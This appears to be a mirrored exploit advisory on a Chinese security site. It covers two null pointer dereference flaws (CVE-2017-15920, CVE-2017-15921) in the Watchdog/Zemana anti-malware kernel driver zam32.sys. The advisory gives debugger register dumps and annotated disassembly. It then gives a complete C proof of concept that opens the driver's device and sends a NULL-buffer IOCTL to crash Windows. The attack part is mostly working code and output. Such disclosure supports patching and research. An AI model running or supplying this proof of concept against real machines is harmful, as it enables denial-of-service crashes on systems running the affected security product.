首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Watchdog Development Anti-Malware / Online Security Pro - NULL Pointer Dereferen
来源:@parvezghh 作者:Anwar 发布时间:2017-10-30  
/*
 
Exploit Title    - Watchdog Development Anti-Malware/Online Security Pro Null Pointer Dereference
Date             - 26th October 2017
Discovered by    - Parvez Anwar (@parvezghh)
Vendor Homepage  - https://www.watchdogdevelopment.com/
Tested Version   - 2.74.186.150
Driver Version   - 2.21.63 - zam32.sys
Tested on OS     - 32bit Windows 7 SP1
CVE IDs          - CVE-2017-15920 and CVE-2017-15921
Vendor fix url   - Will be fixed in a future release
Fixed Version    - n/a
Fixed driver ver - n/a
 
 
 
A null pointer dereference vulnerability is triggered when sending an operation
to ioctls 0x80002010 or 0x80002054. This is due to input buffer being NULL or
the input buffer size being 0 as they are not validated.
 
kd> dt nt!_irp @esi -r
   +0x000 Type             : 0n6
   +0x002 Size             : 0x94
   +0x004 MdlAddress       : (null)
   +0x008 Flags            : 0x60000
   +0x00c AssociatedIrp    : <unnamed-tag>
      +0x000 MasterIrp        : (null)
      +0x000 IrpCount         : 0n0
      +0x000 SystemBuffer     : (null)  <----------- null pointer
 
 
0x80002010
----------
CVE-2017-15921
 
kd> r
eax=00000000 ebx=80002010 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087cd9f esp=a7a80ab8 ebp=a7a80ab8 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
zam32+0xdd9f:
9087cd9f ff30            push    dword ptr [eax]      ds:0023:00000000=????????
 
 
.text:90AD9104                 push    offset aIoctl_register                        ; "IOCTL_REGISTER_PROCESS"
.text:90AD9109                 push    0                                            
.text:90AD910B                 push    edx                                           ; Pointer to "DeviceIoControlHandler" string
.text:90AD910C                 push    208h
.text:90AD9111                 push    offset aMain_c                               
.text:90AD9116                 push    1
.text:90AD9118                 call    sub_90AD3ADA
.text:90AD911D                 add     esp, 18h
.text:90AD9120                 push    esi                                           ; esi is null becomes arg_0 otherwise would point to our input "SystemBuffer"
.text:90AD9121                 call    sub_90AD8D90
 
.text:90AD8D90 sub_90AD8D90    proc near                                            
.text:90AD8D90
.text:90AD8D90 arg_0           = dword ptr  8
.text:90AD8D90
.text:90AD8D90                 push    ebp                                          
.text:90AD8D91                 mov     ebp, esp
.text:90AD8D93                 call    sub_90AD414A
.text:90AD8D98                 test    eax, eax
.text:90AD8D9A                 jz      short loc_90AD8DA6
.text:90AD8D9C                 mov     eax, [ebp+arg_0]                              ; Null pointer dereference
.text:90AD8D9F                 push    dword ptr [eax]                               ; BSOD !!!!
.text:90AD8DA1                 call    sub_90AD428C
.text:90AD8DA6
.text:90AD8DA6 loc_90AD8DA6:                                                        
.text:90AD8DA6                 pop     ebp
.text:90AD8DA7                 retn    4
.text:90AD8DA7 sub_90AD8D90    endp
.text:90AD8DA7
.text:90AD8DAA
 
 
0x80002054
----------
CVE-2017-15920
 
kd> r
eax=861e8320 ebx=80002054 ecx=cff82bd9 edx=90889f2e esi=00000000 edi=c0000001
eip=9087d41a esp=99f4eaac ebp=99f4eadc iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
zam32+0xe41a:
9087d41a c7061e010000    mov     dword ptr [esi],11Eh ds:0023:00000000=????????
 
 
.text:90AD9401                 push    offset aIoctl_get_driv                        ; IOCTL_GET_DRIVER_PROTOCOL
.text:90AD9406                 push    0
.text:90AD9408                 push    edx
.text:90AD9409                 push    2A3h
.text:90AD940E                 push    offset aMain_c                               
.text:90AD9413                 push    1
.text:90AD9415                 call    sub_90AD3ADA
.text:90AD941A                 mov     dword ptr [esi], 11Eh                         ; BSOD !!!! Null pointer dereference otherwise would point to our input "SystemBuffer"
.text:90AD9420                 jmp     loc_90AD9622
 
 
*/
 
 
#include <stdio.h>
#include <windows.h>
 
int main(int argc, char *argv[])
{
    HANDLE         hDevice;
    char           devhandle[MAX_PATH];
    DWORD          dwRetBytes = 0;
 
 
    sprintf(devhandle, "\\\\.\\%s", "zemanaantimalware");
 
    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL);
    
    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Open %s device failed\n\n", devhandle);
        return -1;
    }
    else
    {
        printf("\n[+] Open %s device successful", devhandle);
    }  
 
    printf("\n[~] Press any key to continue . . .");
    getch();
 
    DeviceIoControl(hDevice, 0x80002010, NULL, 0, NULL, 0, &dwRetBytes, NULL);
//  DeviceIoControl(hDevice, 0x80002054, NULL, 0, NULL, 0, &dwRetBytes, NULL);
 
    printf("\n[+] DoSed\n\n");
 
    CloseHandle(hDevice);
    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHPMailer 5.2.21 Local File Di
·DameWare Remote Controller < 1
·Windows NTLM Auth Hash Disclos
·Tizen Studio 1.3 Smart Develop
·Oracle Java SE - Web Start jnl
·Netgear DGN1000 Setup.cgi Remo
·Easy MPEG/AVI/DIVX/WMV/RM to D
·Easy MPEG/AVI/DIVX/WMV/RM To D
·WhatsApp 2.17.52 - Memory Corr
·Mikogo 5.4.1.160608 - Local Cr
·Vir.IT eXplorer Anti-Virus - P
·Linux Kernel 4.14.0-rc4+ - 'wa
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved